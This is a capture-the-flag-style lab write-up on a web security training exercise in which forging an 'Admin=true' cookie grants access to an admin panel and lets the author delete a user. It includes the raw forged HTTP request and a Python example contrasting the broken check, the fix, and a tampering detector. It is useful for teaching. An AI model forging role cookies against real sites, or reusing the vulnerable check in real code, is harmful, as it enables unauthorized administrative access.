User role controlled by request parameter
This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie.
After logging in as "wiener", I attempted to access the admin panel at /admin. Upon inspecting the request in Burp Suite, I observed that it carried an "Admin" cookie set to false. To gain access to the admin functionality, I simply changed the cookie value to true. This adjustment let me proceed through the entire process, ultimately leading to the deletion of the "carlos" user and successful completion of the lab.
GET /admin/delete?username=carlos HTTP/2
Host: 0a79000903e5ceb781eb3e120067003f.web-security-academy.net
Cookie: Admin=true; session=nAeBiUvq3S5T5I9eu6wJKNj5WLoVNaZX
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a79000903e5ceb781eb3e120067003f.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
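The root cause is that the server reads its authorization decision from a cookie the client controls. The following is an added example, not code from the lab or this write-up: it contrasts the broken check with one that derives the role from server-side session state, and adds a simple detection rule for requests whose claimed role disagrees with the session. The session store, the admin session id and the roles are constructed for illustration.

```python
from http.cookies import SimpleCookie

# Constructed server-side session store: opaque session id -> account record.
# The first id is the one seen in the lab request; the second is a placeholder.
SESSIONS = {
    "nAeBiUvq3S5T5I9eu6wJKNj5WLoVNaZX": {"username": "wiener", "role": "user"},
    "ADMIN-SESSION-ID-PLACEHOLDER": {"username": "administrator", "role": "admin"},
}

def parse_cookies(cookie_header: str) -> dict:
    """Parse a raw Cookie: header value into a name -> value dict."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    return {name: morsel.value for name, morsel in jar.items()}

def is_admin_vulnerable(cookie_header: str) -> bool:
    """Broken check: the role is whatever the client claims in the Admin cookie."""
    cookies = parse_cookies(cookie_header)
    return cookies.get("Admin", "false").lower() == "true"

def is_admin_fixed(cookie_header: str) -> bool:
    """Fixed check: only the opaque session id is trusted; the role is looked up
    server-side, so editing any other cookie has no effect on authorization."""
    cookies = parse_cookies(cookie_header)
    account = SESSIONS.get(cookies.get("session", ""))
    return account is not None and account["role"] == "admin"

def handle_delete(cookie_header: str, check) -> int:
    """Status code /admin/delete would return under the given authorization check."""
    return 200 if check(cookie_header) else 401

def claimed_role_mismatch(cookie_header: str) -> bool:
    """Detection hook: True when the client asserts Admin=true but the session
    it presents does not belong to an admin account (tampering indicator)."""
    cookies = parse_cookies(cookie_header)
    claims_admin = cookies.get("Admin", "false").lower() == "true"
    return claims_admin and not is_admin_fixed(cookie_header)
```

A request that flips Admin=true with an ordinary user's session is accepted by the vulnerable check and rejected by the fixed one, and the mismatch function flags it for logging.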